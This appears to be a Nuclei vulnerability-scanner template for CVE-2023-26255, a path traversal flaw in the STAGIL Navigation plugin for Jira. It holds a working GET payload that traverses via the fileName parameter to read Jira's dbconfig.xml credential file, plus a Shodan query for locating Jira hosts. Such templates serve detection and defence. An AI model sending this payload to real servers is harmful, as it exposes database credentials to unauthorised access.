id: CVE-2023-26255

info:
  name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion
  author: DhiyaneshDK
  severity: high
  description: |
    An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.
  reference:
    - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26255
  classification:
    cve-id: CVE-2023-26255
  metadata:
    shodan-query: "title:Jira"
  tags: cve,cve2023,lfi,jira,cms,atlassian

requests:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "<jira-database-config>"

      - type: word
        part: header
        words:
          - '$textMime'

      - type: status
        status:
          - 200